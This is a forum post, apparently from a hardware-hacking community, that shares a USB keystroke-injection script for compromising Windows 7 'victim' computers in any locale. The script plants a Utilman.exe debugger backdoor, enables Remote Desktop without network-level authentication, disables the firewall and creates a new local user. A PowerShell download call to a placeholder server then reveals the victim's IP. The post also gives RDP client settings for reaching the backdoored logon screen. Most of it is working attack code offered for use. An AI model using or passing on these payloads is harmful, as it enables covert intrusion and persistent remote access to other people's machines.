RUdude Posted July 28, 2012 Share Posted July 28, 2012 (edited) Hi there, just want to share some experience of different locales workaround when using exploits like utilman https://github.com/h...utilman-exploit and creating local user with administrator rights. The main problem that current firmware does not support russian language (and many others), so it is impossible to change file ownership or add newly created user to admins group, as for example in localized windows version Administrators group name also localized (_Administratory_) (unfortunately this forum not accept RU chars and I can use russian word here) , so commands like these will never works STRING icacls "%systemroot%\System32\Utilman.exe" /grant _Administratory_:F /T[/CODE][CODE]STRING net localgroup _Administratory_ Local000 /add[/CODE]Post of [b]PCFreak[/b] is amazing http://forums.hak5.o...ouching-a-file/ and this helped me a lot to make such workaround. As there is very restricted time while injecting victim computer, especially if you wil not have physical access to this PC later,here is using also Terminal Services for getting full access. Idea to add local user with restricted righs + utilman hack 'by PCFreak',and then remotely run cmd.exe using "Ease of Access"-button at the logon screen and promote to Admins. After inject script make HTTP request for specified server using powershell, so you may easy find its IP address in webserver logfile.Sure this will work only for real IP addresses, but not with fake or NAT.Windows 7 example, ANY localization, but default keyboard input locale should be US-English anyway, unfortunately. So before injecting try to check or change this. I do not know workaround here, let's discover together?[CODE]DELAY 3000CONTROL ESCAPEDELAY 1000STRING cmdDELAY 1000MENUDELAY 1000DOWNDELAY 200DOWNDELAY 200ENTERDELAY 1000LEFTDELAY 200ENTERDELAY 200ENTERSTRING REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v Debugger /d cmd.exe /fENTERDELAY 200STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /fENTERDELAY 200STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v TSUserEnabled /t REG_DWORD /d 1 /fENTERDELAY 200STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /fENTERDELAY 200STRING netsh firewall set opmode disableENTERDELAY 200STRING net user Local000 /addENTERDELAY 200STRING net user Local000 *ENTERDELAY 200STRING passwordENTERDELAY 200STRING passwordENTERDELAY 200STRING powershell (new-object System.Net.WebClient).DownloadFile('http://_server_IP_address/injected_host.html','%TEMP%\~tmp932.txt');ENTERDELAY 200STRING exitENTER[/CODE]This script also enables Terminal Services with old clients compartibility (without NLA) mode and disables Windows Firewall.For connection to remote logon screen from NLA-enabled MSTSC clients like in Windows 7 you also need some client side modification,otherwise username and password will be requested before connection to server and you never will be able to see Logon screenand will not be able to use EoA-button. To resolve this issue you need to save empty RDP file and edit this using any editor like notepad.exe,these params should be changed/added:[CODE]authentication level:i:0enablecredsspsupport:i:0[/CODE]After this modification save file and connect to server, you will go directly to Logon screen. Give admin rights to your new userand after this you'll be able to login remotely (and locally, sure)---BTW, another locale problem that fast keys (underlined chars in menu items) in Start menu or Right-button menu are also localized,for this reason I am not using these like[CODE]MENUSTRING a[/CODE]instead of this I am select menu item using cursor keys[CODE]MENUDELAY 1000DOWNDELAY 200DOWNDELAY 200ENTER[/CODE]I hope it will be helpful for someone. PS: this script will also work within Terminal Services session, so you will be able also inject remote PC using local USB port, usually it is connected to session on remote side (only fullscreen mode).Regards from Russia :) Edited July 30, 2012 by RUdude Quote Link to comment Share on other sites More sharing options...
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.